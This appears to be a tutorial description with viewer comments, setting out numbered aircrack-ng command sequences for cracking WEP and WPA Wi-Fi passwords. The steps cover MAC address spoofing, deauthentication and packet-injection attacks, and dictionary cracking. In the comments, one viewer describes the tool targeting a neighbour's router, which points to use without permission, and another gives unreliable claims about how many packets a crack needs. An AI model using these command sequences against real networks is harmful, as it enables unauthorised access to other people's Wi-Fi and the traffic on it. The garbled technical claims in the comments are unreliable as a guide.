This is a tutorial on how to crack a wep and wpa encrypted password using the aircrack-ng suite . This information should only be used for education purposes.


Steps to crack wep and wpa:

WEP:
1)airmon-ng stop wlan0
2)ifconfig wlan0 down
3)macchanger --mac 00:11:22:33:44:55 wlan0
4)airmon-ng start wlan0
5)airodump-ng wlan0
6)airodump-ng -c (channel) -w (file name) --bssid (bssid) wlan0
7)aireplay-ng -1 0 -a (bssid) -h 00:11:22:33:44:55 wlan0
8)aireplay-ng -3 -b (bssid) -h 00:11:22:33:44:55 wlan0
or
8)aireplay-ng -2 -p 0841 -c FF:FF:FF:FF:FF:FF -b (bssid) -h 00:11:22:33:44:55 wlan0
9)aircrack-ng (filename-01.cap)

WPA
1)airmon-ng stop wlan0
2)ifconfig wlan0 down
3)macchanger --mac 00:11:22:33:44:55 wlan0
4)airmon-ng start wlan0
5)airodump-ng wlan0
6)airodump-ng -c (channel) -w (file name) --bssid (bssid) wlan0
7)aireplay-ng -0 5 -a (bssid) wlan0
8)aircrack-ng (filename-01.cap) -w (dictionary file)

Is there a way to specify a target when running aircrack-ng? I use the command you show at 5:10 and it automatically targets my neighbor's wpa encrypted router (I think because I get a stronger signal from it).

Also, how much data do you need accumulated to successfully run aircrack-ng? Think I heard 70k, but I'm not sure if that's accurate.

it will stat cracking the network that you told airodump to moniter.

i have cracked a network with as little as 7k but also as much at 500k. all depends on how strong of an encryption it is.

chmod 700 is not to compile lol.... hahaha.. its to give administrative permission to the script. get your fax straight pls lol

Downvoting because you persist in claiming chmod compiles. chmod - change file mode bits. It gives the computer permission to run it as a program. Has absolutely nothing to do with compiling. If you got something this simple wrong, I don't trust the rest of your explanations.

@kivi12k Hi, I haven't closed airodump and I have kept it open. I have been doing it for around 10 minutes now and I have around 60 packets. How do I make sure that it is locked on a channel?

@iggybibi ok so i found out that it was some kind of driver problem since it says prismheader is an unknown command when i start monitoring mode, everything else works except locking witch makes it take a lot of time i tried another driver but with no luck i don't know what to do now
